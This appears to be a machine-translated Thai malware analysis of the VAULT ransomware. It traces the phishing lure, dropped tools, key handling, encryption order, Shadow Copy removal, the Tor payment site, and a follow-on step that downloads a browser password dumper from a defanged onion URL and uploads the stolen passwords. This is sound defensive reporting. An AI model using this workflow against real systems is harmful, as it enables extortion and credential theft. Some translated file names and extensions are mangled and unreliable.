ผลลัพธ์ในทางปฏิบัติของการกระทำดังกล่าวจะลดลงเหลือศูนย์ ความจริงก็คือยังไม่มีวิธีกู้คืนไฟล์ที่เข้ารหัสโดย VAULT ได้ เศษซาก ทางออกเดียว : ถอดดิสก์ HDD หรือ SSD ออกจากอุปกรณ์แล้วติดตั้งใหม่ บางทีเร็ว ๆ นี้จะมีวิธีการถอดรหัสข้อมูลและสามารถกู้คืนข้อมูลได้
การติดเชื้อไวรัส ไฟล์ห้องนิรภัยถูกเข้ารหัส
ผู้ใช้รายแรกได้รับ จดหมายพร้อมข้อความเกี่ยวกับใบแจ้งยอดภาษี / มิเตอร์น้ำ / ใบแจ้งหนี้สำหรับคีย์ที่ปรึกษา.
จดหมายมีลิงก์ไปยังไฟล์ที่แนบมาจากแหล่งข้อมูล download-attach.com... (โฮสติ้งดูเหมือนว่าจะจ่ายด้วย bitcoin) ในไฟล์เก็บถาวรที่ลิงค์นี้ ที่น่าสนใจที่สุดคือ ไฟล์ js ที่สับสนด้วยชื่อที่ละเอียดมาก
เมื่อคุณเรียกใช้ใน % TEMP% ผู้ใช้หลายไฟล์ปรากฏขึ้นและสคริปต์ถูกเขียนขึ้นเพื่อเริ่มต้นระบบเพื่อเริ่ม revault.js
นี่คือไฟล์บางไฟล์ที่ได้รับการระบุ:
svchost.exe - ไบนารี gnupg หลัก
iconv.dll - ไลบรารีที่ใช้ร่วมกันเพื่อให้ gnupg ทำงาน
audiodg.exe - sDelete จาก Sysinternals Suite
การดำเนินการของไวรัส ไฟล์ห้องนิรภัยถูกเข้ารหัส
ในกรณีของเรา เมื่อคอมพิวเตอร์เริ่มทำงาน มีการเปิดตัวสคริปต์ revault.js ซึ่งเปิดไฟล์ cryptlist.cmd bat นี่ก็ด้ายขาดนิดหน่อย
แล้วมันก็เริ่ม ปลอดภัย.batทุกสิ่งที่มืดมนที่สุดกำลังเกิดขึ้นในตัวเขา
ขั้นแรก โปรแกรมสร้างใบรับรองสำหรับเข้ารหัสไฟล์บนคอมพิวเตอร์ชื่อ gk.vlt (Cellar / RSA / 1024 บิต)
จากนั้นจะส่งออกคีย์ส่วนตัวจากมัน ซึ่งจำเป็นสำหรับการถอดรหัสไฟล์ ไปยังไฟล์ vaultkey.vlt
จากนั้นจะสร้างคีย์สาธารณะ pk.vlt ซึ่งกำหนดไว้ล่วงหน้าในไฟล์ bat ด้วยความช่วยเหลือของไฟล์นี้ คีย์ที่จำเป็นในการถอดรหัสข้อมูลของคุณจะถูกเข้ารหัสในอนาคต
เพิ่มเติมใน vaultkey.vlt จะถูกเขียน
BDATE - วันที่ปัจจุบัน
UNAME - ชื่อผู้ใช้ปัจจุบัน
CNAME - ชื่อคอมพิวเตอร์
ULANG - ภาษาของระบบ (ในกรณีนี้จะลงทะเบียนใน RU)
และแฮชแบบสุ่มบางส่วน 01HSH 02HSH 03HSH 04HSH 05HSH FHASH
การเข้ารหัสไวรัส ไฟล์ห้องนิรภัยถูกเข้ารหัส
การเข้ารหัสไฟล์ด้วยการแทนที่มีลักษณะดังนี้
1 - การเข้ารหัสไฟล์
2 - ย้ายไฟล์ที่เข้ารหัสไปยังตำแหน่งเดิม
3 - การเพิ่มนามสกุล .vault ให้กับไฟล์
ในขั้นตอนที่ 1 * .xls และ * จะถูกเข้ารหัส ไฟล์เอกสาร.
ในขั้นตอนที่ 2 ไฟล์ win.vbs, sdwrase.js, sdwrase.cmd จะถูกสร้างและรัน ซึ่งจะปิดการใช้งาน Shadow Copy ในระบบหากระบบเป็น Vista หรือสูงกว่า
และ * .pdf * ถูกเข้ารหัส ไฟล์ rtf.
ในขั้นตอนที่ 3 * .psd * .dwg * จะถูกเข้ารหัส cdr ไฟล์.
ในขั้นตอนที่ 4 ไฟล์ * .cd * .mdb * .1cd * .dbf * .sqlite จะถูกเข้ารหัส
ในขั้นตอนที่ 5 ไฟล์ * .jpg * .zip จะถูกเข้ารหัส
แต่ละไฟล์จะถูกนับ จากนั้นจำนวนไฟล์ที่เข้ารหัสของไฟล์แต่ละประเภทจะถูกบันทึกใน vaultkey.vlt
(เห็นได้ชัดว่าสำหรับการประเมินข้อมูลที่เข้ารหัสโดยทั่วไป)
ถัดไป คีย์ของผู้โจมตีจะเข้ารหัสคีย์ส่วนตัวของคุณและข้อมูลที่เก็บรวบรวมเกี่ยวกับปริมาณข้อมูล
หลังจากนั้น คีย์ของคุณที่จำเป็นในการถอดรหัสข้อมูลจะถูกลบออกด้วยการเขียนซ้ำ 16 (!) พับ
ไฟล์ของคุณได้รับการเข้ารหัสด้วยคีย์ของคุณ และคีย์ของคุณจะถูกเข้ารหัสด้วยคีย์ของผู้โจมตี
จากนั้นไฟล์ที่มีการแจ้งเตือนจะถูกสร้างขึ้น
เว็บไซต์ไวรัส ไฟล์ห้องนิรภัยถูกเข้ารหัส
ไซต์ของอาชญากรไซเบอร์โฮสต์อยู่ในเครือข่าย TOR ที่ไม่เปิดเผยตัวตนและมีเทคโนโลยีขั้นสูงสำหรับ "โครงการ" ประเภทนี้
มีความเพียบพร้อม พื้นที่ส่วนบุคคลและ "เวอร์ชันสาธิต" สำหรับ 3 ไฟล์ ซึ่งผู้โจมตีจะถอดรหัสไฟล์ที่คุณดาวน์โหลดและดาวน์โหลดจากเซิร์ฟเวอร์ของตน แต่ก่อนที่คุณจะเปิดการเข้าถึงไฟล์ ผู้บุกรุกจะดูไฟล์ด้วยตนเอง และหากเขาเห็นว่าไฟล์สำคัญ คุณจะเข้าถึงหัวข้อนี้ไม่ได้ คุณจะได้รับแจ้งเกี่ยวกับเรื่องนี้
มีแม้กระทั่งส่วนช่วยเหลือ
ชำระด้วย bitcoins เท่านั้น
คุณยังสามารถพูดคุยกับผู้เขียน การโน้มน้าวใจและการคุกคามนั้นไร้ประโยชน์ ผู้โจมตีสามารถบล็อกความสามารถในการแชทของคุณได้
รหัสผ่านจากเบราว์เซอร์ - เทคนิคการขโมยรหัสผ่านจากเบราว์เซอร์ที่ติดไวรัส ไฟล์ห้องนิรภัยถูกเข้ารหัสคอมพิวเตอร์
หลังจากสร้างไฟล์ที่มีการแจ้งเตือนแล้วจะมี "โบนัส"
สคริปต์ ultra.js และ up.vbs ถูกสร้างขึ้น
ไฟล์แรกดาวน์โหลดไฟล์จากเกตเวย์ tor2web โดยใช้ลิงก์ hxxp _ // tj2es2lrxelpknfp.onion.city/p.vlt และเปลี่ยนชื่อเป็น ssl.exe
นี่คือ Browser Password Dump v2.6 โดย SecurityXploded
มันบันทึกรหัสผ่านทั้งหมดของคุณจากเบราว์เซอร์ไปยัง cookie.vlt
ถัดไป ไฟล์ที่สองเริ่มอัปโหลดรหัสผ่านของคุณไปยังเซิร์ฟเวอร์เดียวกัน (POST ไปยังสคริปต์ /x.php)
เซิร์ฟเวอร์นี้ไม่ระบุชื่อในลักษณะเดียวกับเซิร์ฟเวอร์สำหรับการกู้คืนและการชำระเงิน (ไม่มีอะไรเพิ่มเติมในส่วนหัว เซิร์ฟเวอร์: Anon line)